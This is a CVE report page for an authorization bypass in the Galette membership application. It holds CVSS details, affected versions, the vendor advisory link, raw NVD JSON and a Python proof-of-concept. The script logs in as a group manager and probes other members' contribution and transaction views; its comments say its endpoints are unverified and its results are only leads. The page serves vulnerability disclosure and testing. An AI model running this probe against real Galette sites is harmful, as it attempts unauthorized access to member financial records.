Security Vulnerability Report
CVE-2025-53922 CVSS 4.9 MEDIUM

CVE-2025-53922

Published: 2025-12-19 16:15:57
Last Modified: 2026-01-02 14:55:02

Description

Galette is a membership management web application for non profit organizations. Starting in version 1.1.4 and prior to version 1.2.0, a user who is logged in as group manager may bypass intended restrictions on Contributions and Transactions. Version 1.2.0 fixes the issue.

CVSS Details

CVSS Score
4.9
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:N (NVD, primary). Note that the impact is scored on integrity only (C:N, I:H), i.e. the metrics describe unauthorized modification of Contributions/Transactions rather than disclosure, and the weakness is classified CWE-863 (incorrect authorization). The CNA's CVSS 4.0 assessment in the raw JSON below rates the same issue 1.3 LOW (PR:L, VI:L), so the 4.9 MEDIUM figure is the NVD re-score; pick the scale your triage process uses rather than mixing the two.

Configurations (Affected Products)

cpe:2.3:a:galette:galette:*:*:*:*:*:*:*:* - VULNERABLE
Galette >= 1.1.4
Galette < 1.2.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
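# CVE-2025-53922 PoC - Authorization Bypass in Galette
# Target: Galette versions 1.1.4 to < 1.2.0 (fixed in 1.2.0)
# Attack vector: a user logged in as *group manager* bypasses the intended
# restrictions on Contributions / Transactions (CWE-863, incorrect authorization).
#
# NOTE(review): NVD scores this CVE C:N / I:H -- an integrity impact, not a
# disclosure.  A read-only probe like the one below therefore cannot prove the
# issue on its own: a served page is only a lead that has to be confirmed by
# hand against the vendor advisory (GHSA-5jp7-5c38-3pv6).  The endpoint paths
# and the `user_id`/`ajax` parameters are carried over from the original PoC
# and are NOT taken from the advisory; verify them against the target before
# relying on any result.
#
# Standard library only.  The original imported `requests`, `sys` and
# `bs4.BeautifulSoup`; the latter two were never used, and urllib with a
# cookie jar is enough to keep one session across a login and two requests.
import http.cookiejar
import os
import urllib.error
import urllib.parse
import urllib.request

# Target and credentials: overridable through the environment so that real
# secrets never have to be hard-coded into the script (the original did).
TARGET_URL = os.environ.get("GALETTE_URL", "http://target-galette.com")
USERNAME = os.environ.get("GALETTE_USER", "group_manager_user")
PASSWORD = os.environ.get("GALETTE_PASS", "password123")
# Member id outside the manager's groups; placeholder, must be set per target.
OTHER_MEMBER_ID = os.environ.get("GALETTE_OTHER_ID", "other_user_id")
# Per-request timeout in seconds; a probe must not hang on a silent host.
TIMEOUT = 10


def login_succeeded(body: str) -> bool:
    """Return True when *body* looks like a page served to a logged-in user.

    Heuristic inherited from the original PoC: the post-login page is assumed
    to contain a logout link.  Confirm it against the target -- a login page
    that merely mentions "logout" (e.g. in a flash message) would pass.
    """
    return "logout" in body.lower()


def looks_granted(status: int, body: str) -> bool:
    """Return True when a response plausibly contains the restricted view.

    Deliberately stricter than the original "HTTP 200 and the word
    'contribution' appears" test, which fires on any authenticated page whose
    navigation menu mentions contributions.  Requires a 2xx status, a
    non-empty body, no login form in the page (session apps commonly answer a
    denied request with a 200 that re-renders the login form; the field name
    checked is the one this script itself posts) and a mention of the view's
    data.  Still a heuristic: treat True as a lead, not a verdict.
    """
    if not 200 <= status < 300 or not body:
        return False
    lowered = body.lower()
    if 'name="password"' in lowered:
        return False
    return "contribution" in lowered or "transaction" in lowered


def fetch_text(opener, url: str, form=None) -> tuple[int, str]:
    """Perform one request through *opener* and return ``(status, body)``.

    *form* (a dict of str -> str) turns the request into a urlencoded POST;
    without it the request is a GET.  HTTP error statuses (401/403/404, ...)
    are returned rather than raised so the caller can distinguish "denied"
    from a transport failure, which still propagates as
    urllib.error.URLError.
    """
    payload = urllib.parse.urlencode(form).encode() if form is not None else None
    request = urllib.request.Request(url, data=payload)
    try:
        with opener.open(request, timeout=TIMEOUT) as response:
            return response.status, response.read().decode("utf-8", "replace")
    except urllib.error.HTTPError as err:
        return err.code, err.read().decode("utf-8", "replace")


def exploit_cve_2025_53922(target_url: str = TARGET_URL,
                           username: str = USERNAME,
                           password: str = PASSWORD,
                           other_member_id: str = OTHER_MEMBER_ID) -> bool:
    """Probe one Galette instance for CVE-2025-53922 as a group manager.

    Logs in with the group-manager account, then requests the contributions
    and transactions views for *other_member_id* -- a member the manager is
    not supposed to see.  Each probe is judged on its own (the original PoC
    overwrote the contributions response with the transactions one and never
    inspected it).

    Returns True when at least one restricted view looks served, i.e. a lead
    that needs manual confirmation; False on login failure or when both views
    are denied.  Transport errors propagate as urllib.error.URLError.
    """
    jar = http.cookiejar.CookieJar()
    opener = urllib.request.build_opener(urllib.request.HTTPCookieProcessor(jar))
    base = target_url.rstrip("/")

    # Step 1: authenticate; the session cookie lands in the jar.
    status, body = fetch_text(opener, f"{base}/login",
                              {"login": username, "password": password})
    if not login_succeeded(body):
        print(f"[-] Login failed (HTTP {status})")
        return False
    print("[+] Logged in as group manager")

    # Steps 2 and 3: request both restricted views for the other member.
    query = urllib.parse.urlencode({"user_id": other_member_id, "ajax": "true"})
    served = []
    for view in ("contributions", "transactions"):
        status, body = fetch_text(opener, f"{base}/{view}?{query}")
        granted = looks_granted(status, body)
        verdict = "served" if granted else "denied/unclear"
        print(f"[*] {view}: HTTP {status} -> {verdict}")
        if granted:
            served.append(view)

    if served:
        print(f"[+] Restricted view(s) served to a group manager: {', '.join(served)}")
        print("[+] Possible CVE-2025-53922 - confirm manually; the scored impact "
              "is integrity (I:H), which this read-only probe does not exercise")
        return True
    print("[-] Access denied or data not found")
    return False


if __name__ == "__main__":
    # Non-zero exit when nothing was served, so the probe composes in scripts.
    raise SystemExit(0 if exploit_cve_2025_53922() else 1)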

References

https://github.com/galette/galette/security/advisories/GHSA-5jp7-5c38-3pv6 (Vendor Advisory - GitHub Security Advisory; the only reference NVD lists for this CVE)
Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-53922", "sourceIdentifier": "[email protected]", "published": "2025-12-19T16:15:56.973", "lastModified": "2026-01-02T14:55:01.890", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Galette is a membership management web application for non profit organizations. Starting in version 1.1.4 and prior to version 1.2.0, a user who is logged in as group manager may bypass intended restrictions on Contributions and Transactions. Version 1.2.0 fixes the issue."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:U/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 1.3, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "UNREPORTED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", 
"vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:N", "baseScore": 4.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.2, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-863"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:galette:galette:*:*:*:*:*:*:*:*", "versionStartIncluding": "1.1.4", "versionEndExcluding": "1.2.0", "matchCriteriaId": "8EB5DB2F-B2F7-4ED4-95D9-2D12F0508F21"}]}]}], "references": [{"url": "https://github.com/galette/galette/security/advisories/GHSA-5jp7-5c38-3pv6", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}